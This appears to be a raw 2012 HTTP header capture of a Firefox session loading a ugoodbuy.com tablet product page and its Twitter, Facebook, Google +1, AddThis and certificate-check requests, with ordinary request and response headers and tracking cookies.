User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ct5.addthis.com/static/r07/sh103.html
Cookie: uid=50998b44eb6f8d42; __atuvc=1%7C45; uit=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 06 Nov 2012 22:12:21 GMT
Content-Length: 105
Date: Tue, 06 Nov 2012 22:12:20 GMT
Connection: close
GET /includes/templates/slucky/images/sprite88.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_en_default.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:12:53 GMT
Etag: &quot;9a5d279-d478-4c251f573f740&quot;
Accept-Ranges: bytes
Content-Length: 54392
Keep-Alive: timeout=10, max=15
Connection: Keep-Alive
GET /widgets/tweet_button.1351848862.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=315569260
Last-Modified: Fri, 02 Nov 2012 09:36:43 GMT
Etag: &quot;8387ae31da8d953f1223ed70a0922e74&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 22625
Date: Tue, 06 Nov 2012 22:12:21 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /rsrc.php/v2/yI/x/1dQf_ATK831.png HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=arial&amp;layout=button_count
HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Last-Modified: Fri, 29 Jun 2012 21:48:06 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: DROeMGRPcdwLS4zkFLAnDVu5opvpxfNclOg2Khukp6I=
Content-Length: 567
Cache-Control: public, max-age=25458303
Expires: Wed, 28 Aug 2013 13:57:24 GMT
Date: Tue, 06 Nov 2012 22:12:21 GMT
Connection: keep-alive
GET /rsrc.php/v2/yf/r/ermz5xIRKqj.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=arial&amp;layout=button_count
Origin: http://www.facebook.com
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 01:14:26 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: N+I8JRuT6Vc1XTfCzT6+2ZeZAilFlXFQGUdFwvperAo=
Content-Length: 37956
Vary: Accept-Encoding
Cache-Control: public, max-age=30898452
Expires: Wed, 30 Oct 2013 13:06:33 GMT
Date: Tue, 06 Nov 2012 22:12:21 GMT
Connection: keep-alive
GET /t.gif?_=1352239941461&count=horizontal&counturl=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&id=twitter-widget-0&lang=en&original_referer=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&size=m&text=Discount%20China%20Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20-%20US%24108.99%20%3A%20UGoodBuy%20Online%20Store%3A&url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html%23.UJmLQ7xy2SU.twitter&type=share&twttr_referrer=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1352239941461&amp;count=horizontal&amp;counturl=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;id=twitter-widget-0&amp;lang=en&amp;original_referer=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;size=m&amp;text=Discount%20China%20Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20-%20US%24108.99%20%3A%20UGoodBuy%20Online%20Store%3A&amp;url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html%23.UJmLQ7xy2SU.twitter&amp;type=share&amp;twttr_referrer=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1351848862.html
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Tue, 06 Nov 2012 22:12:21 GMT
Connection: keep-alive
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=1924p8SdRVo.no./sv=1/am=!5V4AwLTVPeWIaanGfQ/d=1/rs=AItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-914192948&quot;
Expires: Thu, 06 Dec 2012 02:16:34 GMT
Date: Tue, 06 Nov 2012 02:16:34 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 27846
Age: 71747
GET /_/+1/fastbutton?bsv=m&lang=&size=medium&hl=en-US&origin=http%3A%2F%2Fwww.ugoodbuy.com&url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&ic=1&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3D1924p8SdRVo.no.%2Fsv%3D1%2Fam%3D!5V4AwLTVPeWIaanGfQ%2Fd%3D1%2Frs%3DAItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv=m&amp;lang=&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.ugoodbuy.com&amp;url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3D1924p8SdRVo.no.%2Fsv%3D1%2Fam%3D!5V4AwLTVPeWIaanGfQ%2Fd%3D1%2Frs%3DAItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Tue, 06 Nov 2012 22:12:21 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /1/urls/count.json?url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&callback=twttr.receiveCount HTTP/1.1

Host: cdn.api.twitter.com
GET /1/urls/count.json?url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;callback=twttr.receiveCount HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1351848862.html
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=utf-8
Last-Modified: Tue, 06 Nov 2012 22:12:21 GMT
Content-Encoding: gzip
Content-Length: 120
Server: tfe
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=900
Expires: Tue, 06 Nov 2012 22:27:22 GMT
Date: Tue, 06 Nov 2012 22:12:22 GMT
Connection: keep-alive
GET /count/drjj/bg_FFFFFF/txt_000000/border_CCCCCC/columns_2/maxflags_12/viewers_NoLinks/labels_0/pageviews_0/flags_0/ HTTP/1.1

Host: s11.flagcounter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://click.rndtrg.com/feed/xml.php?1851030069&amp;uid=99
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
GET /jot?l=%7B%22_category_%22%3A%22tfw_widgets%22%2C%22event_name%22%3A%22tweetbutton%3Aimpression%22%2C%22dnt%22%3Afalse%2C%22_%22%3A%221352239941461%22%2C%22count%22%3A%22horizontal%22%2C%22counturl%22%3A%22http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html%22%2C%22id%22%3A%22twitter-widget-0%22%2C%22lang%22%3A%22en%22%2C%22original_referer%22%3A%22http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html%22%2C%22size%22%3A%22m%22%2C%22text%22%3A%22Discount%20China%20Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20-%20US%24108.99%20%3A%20UGoodBuy%20Online%20Store%3A%22%2C%22url%22%3A%22http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html%23.UJmLQ7xy2SU.twitter%22%2C%22type%22%3A%22share%22%2C%22logged_in%22%3Afalse%2C%22referrer%22%3A%22http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html%22%2C%22widget%22%3Atrue%2C%22pid%22%3A%22%22%7D HTTP/1.1

Host: r.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1351848862.html
HTTP/1.1 200 OK

Content-Type: image/gif
X-Transaction: ecc27247cbfd63bd
Last-Modified: Tue, 06 Nov 2012 22:12:22 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: guest_id=v1%3A135223994204540195; Expires=Thu, 6-Nov-2014 22:12:22 GMT; Path=/; Domain=.twitter.com
Date: Tue, 06 Nov 2012 22:12:22 GMT
Content-Encoding: gzip
Content-Length: 65
Server: tfe
GET /_/apps-static/_/js/plusone/p1b,p1p/rt=j/ver=Dc1gNqbOKjI.en_US./sv=1/am=!NBYAyjO5WNGFzTm-5g/d=1/rs=AItRSTPVHL6Ho9bn5Px8i4fEz97LQRhx0g/cb=gapi.loaded_1 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv=m&amp;lang=&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.ugoodbuy.com&amp;url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3D1924p8SdRVo.no.%2Fsv%3D1%2Fam%3D!5V4AwLTVPeWIaanGfQ%2Fd%3D1%2Frs%3DAItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;673248103&quot;
Expires: Thu, 06 Dec 2012 00:30:24 GMT
Date: Tue, 06 Nov 2012 00:30:24 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 21182
Age: 78118
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Thu, 01 Nov 2012 01:08:52 GMT
Expires: Fri, 01 Nov 2013 01:08:52 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 507810
GET /_/apps-static/_/js/gapi/googleapis_client,iframes_styles_bubble_internal/rt=j/ver=1924p8SdRVo.no./sv=1/am=!5V4AwLTVPeWIaanGfQ/d=1/rs=AItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ/cb=gapi.loaded_0 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv=m&amp;lang=&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.ugoodbuy.com&amp;url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3D1924p8SdRVo.no.%2Fsv%3D1%2Fam%3D!5V4AwLTVPeWIaanGfQ%2Fd%3D1%2Frs%3DAItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-1120566851&quot;
Expires: Thu, 06 Dec 2012 02:36:00 GMT
Date: Tue, 06 Nov 2012 02:36:00 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 34144
Age: 70582
GET /url/shares.json?url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&callback=_ate.cbs.sc_httpwwwugoodbuycomcubeu18gteliteg3201html0 HTTP/1.1

Host: api-public.addthis.com
GET /url/shares.json?url=http%3A%2F%2Fwww.ugoodbuy.com%2Fcube-u18gt-elite_g3201.html&amp;callback=_ate.cbs.sc_httpwwwugoodbuycomcubeu18gteliteg3201html0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
Cookie: uid=50998b44eb6f8d42; __atuvc=1%7C45; uit=1
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=UTF-8
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Date: Tue, 06 Nov 2012 22:12:22 GMT
Content-Length: 69
Connection: keep-alive
GET /js/tfw/widget/hubclient.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Last-Modified: Fri, 02 Nov 2012 09:35:33 GMT
Etag: &quot;1411999884f419ea8219bf9b531a9c66&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3260
Date: Tue, 06 Nov 2012 22:12:23 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /widgets/hub.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:13 GMT
Etag: &quot;b036a791811effc968bfcb43fa6d6910&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7242
Date: Tue, 06 Nov 2012 22:12:23 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
POST / HTTP/1.1

Host: ocsp.usertrust.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Date: Tue, 06 Nov 2012 22:12:24 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 06:36:11 GMT
Expires: Sat, 10 Nov 2012 06:36:11 GMT
Etag: 4E3F00C75DFA79F2797CEE22BD39C5A9CBC0804A
Cache-Control: max-age=288826,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp6
Content-Length: 471
Connection: close
POST / HTTP/1.1

Host: ocsp.entrust.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 103
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Transfer-Encoding: Binary
Connection: Close
Set-Cookie: avr_3185115268_0_0_4294901760_4272474960_0=6047268492_5302575;max-age=1800;path=/
Transfer-Encoding: chunked
GET /widgets/hub.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:13 GMT
Etag: &quot;b036a791811effc968bfcb43fa6d6910&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7242
Date: Tue, 06 Nov 2012 22:12:24 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;